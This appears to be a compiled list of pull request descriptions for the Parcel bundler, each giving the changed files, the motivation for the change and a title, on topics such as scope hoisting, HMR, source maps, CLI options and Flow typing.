This fixes #1440. Package "dotenv" does something like "process.env.hasOwnProperty( ... )".
Parcel expects a value property lookup on process.env, not a function call. So valueToNode fails if it was called with a function like "hasOwnProperty".
=> Fix dotenv package error

src/Asset.js
Fix "Cannot resolve dependency" errors for valid slash and tilde paths.
Before:
/src/js/index.js
-> /home/user/my-project/src/js/index.js
-> /home/user/my-project/home/user/my-project/src/js/index.js
Error:
Cannot resolve dependency /home/user/my-project/src/js/index.js
After:
/src/js/index.js
-> /home/user/my-project/src/js/index.js
The code already has a way for asset-handlers to signal to the bundler that a dependency has been resolved to an absolute path, but it isn't being used.
fixes #1555
fixes #1986
=> Don't resolve slash and tilde paths twice

package.json, src/utils/env.js
If you're not familiar with dotenv-expand it adds to dotenv to expand vars like this:
```
MONGOLAB_DATABASE=heroku_db
MONGOLAB_USER=username
MONGOLAB_PASSWORD=password
MONGOLAB_DOMAIN=abcd1234.mongolab.com
MONGOLAB_PORT=12345
MONGOLAB_URI=mongodb://${MONGOLAB_USER}:${MONGOLAB_PASSWORD}@${MONGOLAB_DOMAIN}:${MONGOLAB_PORT}/${MONGOLAB_DATABASE}
```
=> Added dotenv-expand to expand env vars

src/cli.js
---
name: 🙋 fix for watch not working when NODE_ENV is 'production'
about: fixes issue #2011 
---
I understand that Parcel should watch changes every time the watch command is being used.
Previously, watch was enabled on dev environment only, while the watch command inserted by users was completely ignored.
With this modification, watch is always enabled if the user passes the command in CLI. 
There is an example in #2011 - first post
=> fixed watch not working when NODE_ENV is production

src/assets/HTMLAsset.js, test/integration/html/index.html
=> allow empty string in meta

CHANGELOG.md
Seemed like the changes were piling up a bit, made a changelog to save some time whenever the next release occurs
=> Changelog v1.10

src/cli.js
Was running `parcel build` and the auto installer started running, I went to disable it and found that the option was not available here
=> add missing --no-autoinstall flag to build command

src/packagers/JSConcatPackager.js, test/integration/scope-hoisting/commonjs/wrap-optional/a.js, test/scope-hoisting.js
---
name: Fix hoisting of optional require calls
---
See test case
See test case
=> Fix hoisting of optional require calls

src/packagers/JSConcatPackager.js, test/integration/scope-hoisting/commonjs/wrap-aliases/a.js, test/integration/scope-hoisting/commonjs/wrap-aliases/node_modules/foo-bar/index.js, test/integration/scope-hoisting/commonjs/wrap-aliases/package.json, test/scope-hoisting.js
---
name: Fix hoist of modules with multiple aliases
---
When a module has multiple aliases it can get trimmed from the output, triggering reference errors at runtime.
`parcel build a.js --experimental-scope-hoist && node dist/a.js`
- `a.js`
```js
require('to-function')
```
- output
```
output = ($BDJ7$init(), {});
^
ReferenceError: $BDJ7$init is not defined
```
=> Fix hoist of modules with multiple aliases

src/assets/HTMLAsset.js, test/html.js, test/integration/html-svg-image/file.svg, test/integration/html-svg-image/index.html
---
name: 🙋 New Pull Request
about: Do you want to change something on parcel?
---
fixes #2055
@DeMoorJasper this is #2058 but properly with tests
=> add <image> as a valid element type to bundle in <svg> tags (w/ tests)

src/transforms/postcss.js
I find defining PostCSS config in `.postcssrc.json` more consistent with another config files like `.eslintrc.json` and `.babelrc.json`. I prefer this way of naming because of transparency and conformity between the filename and content type.
Also, [postcss-load-config](https://github.com/michael-ciniawsky/postcss-load-config) package, which is widely using with PostCSS, supports this way of defining configs and enforces this naming [as recommended](https://github.com/michael-ciniawsky/postcss-load-config#postcssrc).
I think adding `.postcssrc.json` to resolvable configs makes parcel more smooth to switch from another bundler without much effort :slightly_smiling_face:
I didn't find any tests for PostCSS config files, so I'm not sure if I should add ones for this feature :confused:
=> Possibility to use `.postcssrc.json` as PostCSS config file

src/utils/installPackage.js
Changed the logic to determine which package manager to use during auto-installation.
The only situation Parcel should use yarn is when it satisfies
- There is `yarn` command available
AND
- There is `yarn.lock` file
AND
- There is NOT `package-lock.json`
Otherwise, it uses npm.
Fixes #2117 
Setup a testing directory with different setups (package-lock existence, yarn.lock existence, yarn command existence).
The only situation Parcel should use yarn is when
- There is `yarn` command available
AND
- There is `yarn.lock` file
AND
- There is NOT `package-lock.json`
~~- [ ] Added/updated unit tests for this change~~
There is a situation where there are both package-lock.json and yarn.lock. Having npm as default package manager means that it should use npm in this situation.
That's why there …
=> use npm for auto-install by default

src/packagers/JSPackager.js, test/integration/js-dedup-hoist/a.js, test/integration/js-dedup-hoist/hello1.js, test/integration/js-dedup-hoist/hello2.js, test/integration/js-dedup-hoist/index.js, test/integration/js-dedup-hoist/package.json, test/javascript.js
Assets that are depended on in more than one bundle (e.g. hoisted) shouldn't be deduped in the parent bundle or the asset ids will be incorrect. The child bundle has no way of accessing the parent deduped id. This PR disables deduping for modules which are accessed by an external bundle.
=> Don't dedupe assets that are depended on in more than one bundle

src/packagers/JSPackager.js
Very small change, but I noticed how these were calling `this.dest` directly over using the Packager's methods.
=> Use this.write and super.end for JSPackager

.prettierignore
Looks like `.prettierignore` didn't get updated when you changed `parcel` -> `parcel-bundler`
=> fix .prettierignore

packages/core/parcel-bundler/src/Bundler.js, packages/core/parcel-bundler/src/Server.js, packages/core/parcel-bundler/src/cli.js, packages/core/parcel-bundler/src/utils/generateCertificate.js
=> Add --host option

CONTRIBUTING.md
The Previous link was redirecting to `https://github.com/parcel-bundler/parcel/blob/master/graphs/contributors` that doesn't exist. Replacing to the full link like we have in `README.md`.
=> Update contributors broken link in CONTRIBUTING.md

packages/core/core/src/AssetGraph.js, packages/core/core/src/Parcel.js, packages/packagers/js/src/index.js, packages/packagers/js/src/prelude.js
Wraps all assets in functions.
=> Parcel 2: Simple working JS packager

packages/core/core/package.json, packages/core/core/src/AssetGraph.js, packages/core/core/src/Parcel.js, packages/core/core/src/PromiseQueue.js, packages/core/core/test/PromiseQueue.test.js, yarn.lock
Graph building improvements base on last PR feedback
=> Graph building improvements

packages/core/core/src/AssetGraph.js, packages/core/core/src/Graph.js, packages/core/core/src/PackagerRunner.js, packages/core/core/src/Parcel.js, packages/core/core/src/TransformerRunner.js, packages/core/core/test/AssetGraph.test.js, packages/core/core/test/Graph.test.js, packages/core/plugin/index.js.flow, packages/core/types/index.js, packages/core/utils/config.js, packages/examples/simple/src/index.js, packages/examples/simple/src/test.txt, packages/packagers/js/src/index.js, packages/transformers/js/package.json, packages/transformers/js/src/index.js, packages/transformers/js/src/visitors/dependencies.js, packages/transformers/js/src/visitors/env.js, packages/transformers/js/src/visitors/fs.js, packages/transformers/js/src/visitors/globals.js
This adds a new node type to the asset graph: `connected_file`. This node is like a cross between a normal `file` node and a `dependency` node. Connected files are returned by transformers like dependencies, but are fully resolved to absolute paths in the transformer, and do not get transformed like normal files. Connected files are watched, however, and trigger a rebuild of any file nodes that are connected to them.
Connected files are useful in two cases: 
1. As a part of assets for compilers that include external files as part of their builds. This is the case for stylus, sass, etc. which have their own `@import` syntax that they process themselves. The output of the compilation will include all imported files in the built asset, so we have no need to resolve and transform them. We do …
=> Parcel 2:  Add connected file support to asset graph

packages/core/parcel-bundler/src/assets/ElmAsset.js, packages/core/parcel-bundler/test/elm.js
Trying to solve issue #2104 again.
=> add debugger flag for non production builds in Elm

packages/core/parcel-bundler/src/assets/CSSAsset.js, packages/core/parcel-bundler/src/assets/GraphqlAsset.js, packages/core/parcel-bundler/src/assets/VueAsset.js
1. Use correct type parameter for JSON.stringify.
2. Remove `supplemental` not null checking which will never be empty.
=> refactor: JSON.stringify replacer can not be boolean

packages/core/logger/src/Logger.js
When using `--log-level 5` on a system with US locale the command failed because the name of the log file to be created contained slashes (eg. `2018/11/16`).
I replaced `Date.toLocaleString()` with `Date.toISOString()` to fix that and provide consistent results.
=> Fix debug log files for certain locales

packages/core/parcel-bundler/src/scope-hoisting/hoist.js, packages/core/parcel-bundler/src/scope-hoisting/renamer.js, packages/core/parcel-bundler/test/integration/scope-hoisting/es6/jsx-pragma/.babelrc, packages/core/parcel-bundler/test/integration/scope-hoisting/es6/jsx-pragma/a.js, packages/core/parcel-bundler/test/integration/scope-hoisting/es6/jsx-pragma/react.js, packages/core/parcel-bundler/test/integration/scope-hoisting/es6/rename-superclass/a.js, packages/core/parcel-bundler/test/integration/scope-hoisting/es6/rename-superclass/b.js, packages/core/parcel-bundler/test/scope-hoisting.js
With this change the renaming part of scope-hoisting seems to work with other babel-transforms as well. E.g.:
1. Superclass identifiers get renamed correctly (closes #2204)
2. `<span>Test</span>` gets transpiled to `React.createElement("span", null, "Test")`, but React isn't getting renamed (same for `h` of preact, hyperapp). (closes #1699, closes #2084)
3. `babel-plugin-lodash` transforms the ast just like jsx (closes #1821)
5. most things regarding `constantViolations undefined`: with `styled-jsx` - closes #1538, with `plugin-transform-runtime` - closes #2255
I've added test for jsx and superclasses to the scope-hoisting/es6 folder.
Is a reason for the custom renaming logic? All scope-hoisting tests still pass with simply `scope.rename(oldName, newName)`. 
Previously, scope-hoisting …
=> Scope hoisting renaming after babel transforms

packages/core/parcel-bundler/package.json, packages/core/parcel-bundler/src/assets/RustAsset.js, packages/core/parcel-bundler/src/assets/TOMLAsset.js, packages/core/parcel-bundler/src/utils/config.js, yarn.lock
As toml is an abandoned package, switch to @iarna/toml
for implementation of the latest toml spec (v0.5.0).
Also remove tomlify-j0.4, as @iarna/toml supports encoding
and decoding.
Resolves #2258.
Reusing the same tests as before, since it's just a package swap.
=> Switch from toml to @iarna/toml

packages/core/parcel-bundler/package.json, yarn.lock
Just forces everyone to use the latest version of deasync to prevent node 11 install issues.
Closes #2245
=> Update deasync to 0.1.14 (Node 11 fix)

packages/core/core/src/Asset.js, packages/core/core/src/AssetGraph.js, packages/core/core/src/Graph.js, packages/core/core/src/TransformerRunner.js, packages/core/core/src/createDependency.js, packages/core/core/test/AssetGraph.test.js, packages/core/types/index.js, packages/packagers/js/src/JSPackager.js, packages/transformers/js/src/JSTransformer.js, packages/transformers/js/src/visitors/dependencies.js, packages/transformers/terser/src/TerserTransformer.js
This is an experiment with creating a mutable Asset class with some helper methods for transformers to use rather than only returning plain objects. The methods include things like `getConfig` and `getPackage` helpers, along with `addDependency`, `addConnectedFile, and `createChildAsset` mutation/factory methods. None of these are required - plain objects also work fine, and are converted on the fly by the transformer runner. I think it simplifies transformers quite a bit, and also simplifies the transformer runner.
=> Parcel 2: Asset methods

packages/core/parcel-bundler/src/visitors/dependencies.js, packages/core/parcel-bundler/test/integration/dynamic-external/index.js, packages/core/parcel-bundler/test/javascript.js
Closes #2374 Fixes #2358
Future work: Rewrite url imports to use parcel's bundle loader for IE support.
```Javascript
const lodash = import('https://cdnjs.cloudflare.com/ajax/libs/lodash.js/4.17.11/lodash.min.js');
lodash.then(() => console.log(_.VERSION));
```
Run the example or experiment a lil with this branch.
=> Skip external import's from processing

packages/core/parcel-bundler/package.json, packages/core/parcel-bundler/src/assets/ElmAsset.js, packages/core/parcel-bundler/test/elm.js, yarn.lock
This is a copy of https://github.com/parcel-bundler/parcel/pull/2378, which is having some technical difficulties.
This PR adds integration with elm-hot - the HMR solution for Elm (at least I don't know about any other :-)). I've published this code before as a plugin, and after a suggestion from @domenkozar decided it would make more sense upstream.
This will help when editing the app without changing the type of the app's model. Visual tweaks or testing the update logic should be much easier with working HMR.
Editing an Elm app (like changing a string) should cause the changes to be applied, without refreshing the page or changing the app's state.
=> Add support for HMR with elm-hot

packages/core/parcel-bundler/src/builtins/bundle-loader.js
If a network error occurs while loading a dynamic bundle, remove the cached promise as this will always result in the same network error. This will allow users to retry fetching this bundle.
Fixes #2326 
Based on the fix by @diem98
=> Don't cache dynamic bundles that had a network error

packages/bundlers/default/src/DefaultBundler.js, packages/core/core/src/Asset.js, packages/core/core/src/AssetGraph.js, packages/core/core/src/BundleGraph.js, packages/core/core/src/BundlerRunner.js, packages/core/core/src/Graph.js, packages/core/core/src/PackagerRunner.js, packages/core/core/src/Parcel.js, packages/core/types/index.js, packages/dev/babel-preset/common.js, packages/dev/babel-preset/legacy.js, packages/dev/babel-preset/modern.js, packages/dev/babel-preset/package.json, packages/examples/simple/package.json, packages/examples/simple/src/async.js, packages/examples/simple/src/async2.js, packages/examples/simple/src/index.js, packages/examples/simple/src/worker.js, packages/packagers/js/src/JSPackager.js, packages/transformers/js/src/JSTransformer.js, packages/transformers/js/src/visitors/dependencies.js, packages/transformers/js/src/visitors/env.js, yarn.lock
This is an implementation of the default bundler plugin for Parcel 2, along with the infrastructure in core necessary to support it. It implements code splitting, splitting by asset type, asset deduping, and bundle splitting.
Closes #2139. Related to #885.
* Adds a `BundleGraph` to core, and changes the Bundler plugin API to return one. Bundler plugins accept the complete asset graph, along with an empty bundle graph instance to fill in. This way we don't need to expose the constructor to plugins. A `BundleGraph` contains nodes of type `bundle_group` and `bundle`.
* Each `Bundle` object now has an `AssetGraph` in it instead of just an array of assets. This gives packagers access to the dependencies and other information in the graph for that bundle.
* Adds a bunch of helper methods that …
=> Parcel 2: BundleGraph and Default Bundler plugin

packages/core/parcel-bundler/src/transforms/postcss.js
Fixes autoinstalling of cssnano (previously, parcel tried to install the package "cssnano/package.json". 
Fixes #2290, this seems to be a cleaner/easier fix than what was proposed there.
With this change, `localrequire("cssnano/package.json")` never fails, because it will only run after cssnano is installed.
Should there be a test for this? If yes, how should that look like?
Building any html file which imports a css file.
=> Fix autoinstall of cssnano

azure-pipelines-template.yml
Currently when a test fails CI doesn't show which test, which is pretty inconvenient as that's the only time it matters to have a nice overview of the tests.
=> Also publish test results when any test fails

packages/core/integration-tests/test/integration/schema-jsonld/index.html, packages/core/parcel-bundler/src/assets/JSONLDAsset.js
This pull request implemented processing of multiple assets in JSON-LD.
Before this PR, JSON-LD like below wouldn't get processed correctly, which `image` array would get ignored:
```html
<script type="application/ld+json">
{
"@context": "http://schema.org",
"@type": "LocalBusiness",
"description": "This is your business description.",
"name": "Parcel's parcel",
"telephone": "555-111-2345",
"openingHours": "Mo,Tu,We,Th,Fr 09:00-17:00",
"logo": {
"@type": "ImageObject",
"url": "images/logo.png",
"width": 180,
"height": 120
},
"image": ["images/image.jpeg", "images/image.jpeg"]
}
</script>
```
Please just check updated test case.
=> Process array of assets for JSON-LD

packages/core/parcel-bundler/src/builtins/bundle-url.js
This PR adds support for dynamic bundle loading (with code splitting) for the `chrome-extension://` protocol.
Usually, it's not necessary to use code-splitting with a chrome extension as the resources are loaded from disk. That said if you build your application for the web as well as a chrome extension, attempting to keep a unified code base and using code splitting to optimize the web build, you'll be forced to use code splitting for your chrome extension too.
This shouldn't be a problem; however, parcels logic for detecting bundle paths uses a regex that includes supported protocols. `file://`, `http://`, `https://` and `ftp://` are present, but not `chrome-extension://` which causes it to always load bundles relative to the root path when using `chrome-extension://`.
=> Add support for `chrome-extension://` protocol to bundle-url.js

packages/core/integration-tests/test/css.js, packages/core/integration-tests/test/sourcemaps.js, packages/core/parcel-bundler/src/Bundle.js
Closes #2460.
What I do here is preserve the original file extension before appending `.map` to the source map files.
Instead of `index.map` it would generate `index.js.map`. According to the [spec](https://sourcemaps.info/spec.html) it's the recommended convention. It also solves a real issue for debugging Javascript in VSCode.
While it solves the issue, I don't like the tech debt I introduce. Specifically, I don't like the conditionals about specific types of bundles in the otherwise abstract code.
@DeMoorJasper please, take a look and let me know if you can think of a more pleasing solution architecture-wise. This is my first peek at the internals of Parcel, so I don't have the whole context yet.
=> Generate source map files with long extentions (e.g. .js.map)

packages/core/watcher/src/Watcher.js
**Solves issue of** auto-rebuild / hot-reloading not working for files/directories having `.git` (e.g. xyz.github.io) in it
**How?** So instead of ignoring any file/directories containing .git it will only ignore ones where .git appear at start of file/directories
Fixes 
https://github.com/parcel-bundler/parcel/issues/2231
https://github.com/parcel-bundler/parcel/issues/2093
Create file `hello.git.js`
```
console.log("hi from hello.git.js")
```
and run ` parcel hello.git.js` and make changes in file.
=> fix Watcher ignored regex

packages/core/parcel-bundler/src/builtins/bundle-url.js
Add support for code splitting, in locally loaded Firefox extensions.
With the `moz-extension://` protocol.
This has already been added for `chrome-extension://`, which is used by chromium based browsers, but not Firefox. See #2434
=> Add support for Firefox's 'moz-extension://' protocol, to bundle-url.js

packages/core/parcel-bundler/package.json
=> upgrade htmlnano dep

packages/core/integration-tests/test/integration/globals/index.js, packages/core/integration-tests/test/javascript.js
Removes some warnings when running the tests
Based on https://nodejs.org/en/docs/guides/buffer-constructor-deprecation/#variant-1
=> Use Buffer.from instead of new Buffer()

packages/core/integration-tests/test/integration/scope-hoisting/es6/re-export-renamed/a.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/re-export-renamed/b.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/re-export-renamed/c.js, packages/core/integration-tests/test/scope-hoisting.js, packages/core/parcel-bundler/src/scope-hoisting/renamer.js
Renaming an identifier incorrectly renaming the local identifier of re-export+rename statements as well. (i.e. a function named `x` and `export {x as func) from "...";`)
This is fixing https://github.com/babel/babel/issues/9266 manually, because parcel doesn't use babel's `scope.rename`. Maybe we should wait for the babel team to respond there
Closes #2284
Described in https://github.com/babel/babel/issues/9266
=> re-exporting and renaming when scopehoisting

packages/core/integration-tests/test/scope-hoisting.js, packages/core/parcel-bundler/src/packagers/JSConcatPackager.js
The scopehoisting test on Windows were disabled because the `afterEach` test hook deleting the `dist` folder failed with a permissions error.
This was because `JSConcatPackager.end()` didn't call `super.end()` to close the file handle (no issues on macOS / Linux).
I also wrapped the call to `concat` and everything thereafter in a try-catch, because `let {code: output} = concat(this, ast);` can throw because of e.g. a missing import, meaning `super.end()` would never be called.
=> Fix and reenable windows scope-hoisting tests

packages/core/core/src/Parcel.js, packages/core/integration-tests/test/utils.js, packages/core/register/package.json, packages/core/register/src/hook.js, packages/core/workers/src/Worker.js
I played around a bit with `@parcel/register` on #2399 to see if I could simplify it a little. Basically, instead of tracking things by filename and needing to do multiple resolves + package.json lookups, I take advantage of the fact that `require` is synchronous in Node. This means that only one require can be processed at a time. Using this, we can set a flag right as we are about to process a file in Parcel's resolver or transformer, and unset it at the end. Any `require` calls that happen while that flag is set are internal to Parcel or one of its deps and should use the default node require implementation.
Additionally, I added `unref` calls to the child processes and their IPC channels so that they don't keep the main process running. I'm not totally sure this won't break anything …
=> @parcel/register slight refactoring

packages/core/parcel-bundler/src/assets/JSAsset.js, packages/core/parcel-bundler/src/assets/TypeScriptAsset.js, packages/core/parcel-bundler/src/utils/isAccessedVarChanged.js
**What?** Invalidate `TypeScriptAsset` when inline process.env is updated. 
Also, we are using same code for `JSAsset`, So extracted common code as utility.
Solves https://github.com/parcel-bundler/parcel/issues/2480
See https://github.com/parcel-bundler/parcel/issues/2480
See Code Sample here https://github.com/parcel-bundler/parcel/issues/2480
=> added fix for typescript asset invalidation

packages/core/parcel-bundler/bin/cli.js
**tl;dr: When a lot of parallel operations request libuv thread pool, the bundler is not able to handle the response from the promise and the process stops working.**
I am currently migrating a larger project form Webpack to Parcel. When running the build, at some point the build just stops, also CPU is idle. When the process is restarted (multiple times) by hand, at some point in time the build succeeds, because the cache is already warmed up.
I tried to run the build with different options, in development and production mode, with and without (experimental) scope hoisting and also with different node versions (10 and 11) using the `src` and `lib` version. It's always the same result, even if not 100% deterministic (it stops at different files). I experienced the issue on Mac OSX and …
=> Fix hang up when a lot of parallel operation request the file system

packages/core/parcel-bundler/src/cli.js
#1126 
~~Replaces `command.port` with `process.env.PORT`~~
Adds `process.env.PORT` as additional default
I _think_ it's ok to just replace? 😅 
Don't think test are applicable here.
=> use env port

packages/core/integration-tests/test/html.js, packages/core/parcel-bundler/test/sourcemaps.js
This PR refactors the htmlnano tests to test for filesize changes instead of linebreaks.
Output should be smaller than input after minification...
Closes #2532 Closes #2588
=> Refactor htmlnano tests to test for filesize

packages/core/integration-tests/test/html.js, packages/core/parcel-bundler/src/assets/HTMLAsset.js
Admittedly a niche case, but it should not throw an error:
```
index.html: Cannot read property 'walk' of null
parcel-bundler/src/assets/HTMLAsset.js
```
(I only indented the walk call, git's diffing algorithm makes it seem like more changed)
Proper fix for #2397
Processing an empty html file in dev mode.
=> Handle empty html files

packages/core/parcel-bundler/src/Server.js
Requesting output files starting with a dot would result in them being handled as missing.
As documented: https://github.com/expressjs/serve-static#dotfiles
Closes #2628
```
dist
|- .mybundle.213fasd.js
|- index.html (includes .mybundle.213fasd.js)
```
=> Allow dotfiles to be served

packages/core/integration-tests/test/integration/sourcemap-sourcemappingurl-multiple-entrypoints/a/index.js, packages/core/integration-tests/test/integration/sourcemap-sourcemappingurl-multiple-entrypoints/b/index.js, packages/core/integration-tests/test/integration/sourcemap-sourcemappingurl/index.js, packages/core/integration-tests/test/sourcemaps.js, packages/core/parcel-bundler/src/packagers/JSPackager.js
sourceMappingURL is not correct for bundles with multiple entry points
Taken from #2607 
```
parcel build src/a/index.js src/b/index.js
```
The two output files should contains these sourcemap comments:
```
a/index.js: `//# sourceMappingURL=/a/index.js.map`
b/index.js: `//# sourceMappingURL=/b/index.js.map`
```
but in reality `/a/` and `/b/` are not there.
See #2607 for detailed instructions. For tldr, see Examples 👆
=> Fix sourceMappingURL for bundles with multiple entry points

packages/core/parcel-bundler/src/assets/RustAsset.js
Fixes #2184
When importing a Rust asset on Windows, an error like this occurs:
```
×  Error writing to cache: ENOENT: no such file or directory, stat 'C:\Users\lmorc\devel\rust-wasm-play\src\C'
```
This appears to be an issue with how RustAsset [attempts to parse a deps file](https://github.com/parcel-bundler/parcel/blob/31bd420580e68ae82dfb88a7926364ec1fdac800/packages/core/parcel-bundler/src/assets/RustAsset.js#L179) using ":" - which fails on Windows because ":" is a part of file paths like `C:\users\...`
Switching that parsing to ": " seems to address the problem.
Just following [the basic Rust example from the docs](https://parceljs.org/rust.html)
Build the example from the docs on Windows under PowerShell (e.g. *not* within a WSL Ubuntu Bash shell) - no error should occur.
- Sorry, …
=> Fix dependency list parsing in RustAsset for paths on Windows

packages/core/core/src/AssetGraph.js, packages/core/core/src/Graph.js, packages/core/core/src/Parcel.js, packages/core/core/test/AssetGraph.test.js, packages/core/core/test/Graph.test.js, packages/core/plugin/src/PluginAPI.js, packages/packagers/js/src/JSPackager.js
[ES Modules are automatically in strict mode](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Strict_mode#Strict_mode_for_modules), so there isn't a need for this pragma. Environments that support modules natively run them in strict mode, but in our case Babel also inserts `'use strict'` pragma in its commonjs output.
Test Plan: Run `yarn build` and verify the corresponding `lib` files
continue to have a `'use strict'` pragma inserted at the top by babel.
cc @padmaia @devongovett
=> [v2] Remove 'use strict' pragmas from es modules in source

packages/core/core/src/ConfigResolver.js
Every other use of the modules `config` and `localRequire` in
`@parcel/utils` imports it from `@parcel/utils/lib/config`, which is a real
file on disk after build. Without this, both mocha and flow fail right
away.
Please let me know if this is intentional for some reason.
Test Plan: `mocha` in `packages/core` and `flow` in the repo root. Verify
error messages related to the missing module are no longer there.
=> [v2] Fix import paths in ConfigResolver

packages/core/parcel-bundler/src/Asset.js, packages/core/parcel-bundler/src/assets/VueAsset.js
Asset IDs are base64 encoded, so `+` and `/` are also possible. The IDs are used for hoisting imports and exports, but with an ID `kA+M` then `$kA+M$exports` is not a valid JS identifier, causing an error (see issue): `Unexpected token, expected ; (2:19)`
Collisions might have become more likely now, but shouldn't be that significant?
Fixes #1971
https://github.com/njscholfield/new-tracks/tree/8eba7b08f286cac510d55e5d85800d64633dd3fe
=> For scope hoisting, Asset IDs cannot contain + or / (base64)

packages/core/parcel-bundler/src/Server.js
Try to fix #2550 buy sending CORS header in send500 and send404.
=> Send CORS headers when a file does not exist

packages/core/integration-tests/test/hmr.js, packages/core/integration-tests/test/integration/hmr-circular/index.js, packages/core/integration-tests/test/integration/hmr-circular/local.js, packages/core/parcel-bundler/src/builtins/hmr-runtime.js
This PR prevents a stack overflow when updating files that have circular dependencies. This issue occurs when HMR tries to reload dependencies and gets stuck flowing the loop. The fix is achieved by adding a set that contains each of the asset ID updated in the same HMR update event. This set is used to keep track of what has been updated and skips loading the same asset more than once.
Fixes #1192
=> Prevent circular deps from causing a stack overflow in HMR runtime

package.json, yarn.lock
Bumped the requirement in package.json as semver treats <1.0.0 specially with caret. The added friction is probably worth it given Flow does not follow semver.
Test Plan: `yarn flow` and verify no new flow errors introduced
=> [v2] Upgrade flow to 0.93.0

packages/core/parcel-bundler/src/transforms/babel/jsx.js
=> fix: set default pragmaFrag option :bug:

.flowconfig, packages/bundlers/default/src/DefaultBundler.js, packages/core/core/src/AssetGraph.js, packages/core/core/src/BundleGraph.js, packages/core/core/src/Graph.js, packages/core/types/index.js, packages/core/types/unsafe.js
This allows us to incrementally adopt [flow strict](https://flow.org/en/docs/strict/), a stricter set of rules, including built-in type-aware lints that detect questionable, unclear, or unsound behavior. Notably, this bans `any`, `Object`, `Function` and other unsound types. I started with `@parcel/types` by extracting unsafe types (those that are or include `any`) into `unsafe.js`, which will remain out of strict mode while we further refine our types.
I also took the opportunity to repurpose `TraversalContext` as `TraversalActions`, which was confusingly yielded along with something else called "context".
Test Plan: `flow` with no additional errors.
=> [v2] Begin to adopt flow strict, starting with @parcel/types

packages/core/core/src/Parcel.js
This means that we don't need the config around in `run` itself. Referencing this nonexistent local caused a flow (and I assume runtime) error.
Test Plan: ¯\\\_(ツ)\_/¯
=> [v2] Parcel.js: Move worker creation into `init`

.flowconfig, flow-libs/abortcontroller-polyfill.js.flow, packages/core/core/src/AssetGraphBuilder.js
Once we're happy with them, we can contribute them upstream to flow-typed.
Also removes our custom `Signal` type in `AssetGraphBuilder.js` to use the DOM `AbortSignal` already defined in Flow.
=> Add flow typings for abortcontroller-polyfill

packages/core/parcel-bundler/src/Asset.js, packages/core/parcel-bundler/src/Bundler.js, packages/core/parcel-bundler/src/Resolver.js, packages/core/parcel-bundler/src/SourceMap.js, packages/core/parcel-bundler/src/assets/GLSLAsset.js, packages/core/parcel-bundler/src/assets/LESSAsset.js, packages/core/parcel-bundler/src/assets/RawAsset.js, packages/core/parcel-bundler/src/assets/SASSAsset.js, packages/core/parcel-bundler/src/transforms/babel/babelrc.js, packages/core/parcel-bundler/src/utils/loadPlugins.js, packages/core/parcel-bundler/src/utils/localRequire.js
According to eslint's [no-return-await ](https://eslint.org/docs/rules/no-return-await) rule:
> Inside an async function, return await is seldom useful. Since the return value of an async function is always wrapped in Promise.resolve, return await doesn’t actually do anything except add extra time before the overarching Promise resolves or rejects. The only valid exception is if return await is used in a try/catch statement to catch errors from another Promise-based function.
=> Remove unnecessary return await

packages/bundlers/default/src/DefaultBundler.js, packages/core/core/src/Asset.js, packages/core/core/src/AssetGraph.js, packages/core/core/src/AssetGraphBuilder.js, packages/core/core/src/BundlerRunner.js, packages/core/core/src/Dependency.js, packages/core/core/src/Graph.js, packages/core/core/src/PackagerRunner.js, packages/core/core/src/Parcel.js, packages/core/core/src/PromiseQueue.js, packages/core/core/src/ResolverRunner.js, packages/core/core/src/TransformerRunner.js, packages/core/core/src/worker.js, packages/core/types/index.js, packages/core/types/unsafe.js, packages/core/utils/src/config.js, packages/resolvers/default/src/DefaultResolver.js
This makes many of the defined types [exact object types](https://flow.org/en/docs/types/objects/#toc-exact-object-types). This [is going to be the default in Flow going forward](https://medium.com/flow-type/on-the-roadmap-exact-objects-by-default-16b72933c5cf) and anecdotally catches many issues like mistyped property names from silently introducing errors. Flow will provide codemods to get us back to the same type notation while maintaining these semantics and behavior.
These are the more trivial cases. There are more exact objects to come.
Also replaces our custom `Signal` type with the DOM `AbortSignal`, since Flow doesn't differentiate between environments. Seems okay for now.
Test Plan: `flow`
=> [v2] Make types exact

packages/core/logger/test/mocha.opts, packages/core/watcher/test/mocha.opts, packages/core/workers/test/mocha.opts
This makes sure that babel continues to process files across packages. Addresses test failures in the v2 branch.
Test Plan: `yarn test` and verify errors on v2 have been resolved.
=> Use @parcel/babel-register for mocha.opts across packages

packages/core/integration-tests/test/integration/scope-hoisting/es6/dynamic-import-dynamic/a.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/dynamic-import-dynamic/b.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/dynamic-import-dynamic/c.js, packages/core/integration-tests/test/scope-hoisting.js, packages/core/parcel-bundler/src/packagers/JSConcatPackager.js
Closes #2300, @garthenweb
Probably introduced by #1682
When the assets are iterated on `JSConcatPackager.start`
https://github.com/parcel-bundler/parcel/blob/c670decf1e8a039a80a47395bf916643d1955613/packages/core/parcel-bundler/src/packagers/JSConcatPackager.js#L32-L49
they are also added to the `assets` Map. For "normal" bundles `bundle-loader` is added here, but for dynamically imported bundles only actual static imports is added.
For dynamically imported bundles which need also need the `bundle-loader`, it gets added here (called by `addAsset`) https://github.com/parcel-bundler/parcel/blob/c670decf1e8a039a80a47395bf916643d1955613/packages/core/parcel-bundler/src/packagers/JSConcatPackager.js#L400-L415, but `addAssetToBundle` didn't add it to the `assets` map, resulting in this error: …
=> Fix scopehositing with nested dynamic imports

packages/core/core/src/AssetGraph.js, packages/core/register/example/index.js, packages/core/register/src/hook.js, packages/dev/eslint-config/index.js
Clean existing lints and enable recommended flowtype lints
This:
* Resolves an unused import lint
* Suppresses lint warnings for two reasonable cases of console.log, though one should probably use `@parcel/logger`
* Enables recommended flowtype lints. As far as I can tell, we had the flow eslint plugin installed and registered but never opted into any of its rules. This does that, though we could take a more minimal approach and just enable the `flowtype/define-flow-type` rule, which we need for eslint to ignore special global flow types and functions.
Test Plan: `yarn lint` from the root with no errors. `yarn flow` from the root with no errors.
=> Clean existing lints and enable recommended flowtype lints

.eslintrc.json, packages/core/parcel-bundler/src/Resolver.js, packages/core/parcel-bundler/src/transforms/babel/babelrc.js, packages/core/parcel-bundler/src/utils/loadPlugins.js
This sets violations of the `no-return-await` to `error`. `return await` is redundant as values returned from an async function are effectively wrapped in a `Promise.resolve`, and awaiting another promise in addition to this will defer resolution another microtick.
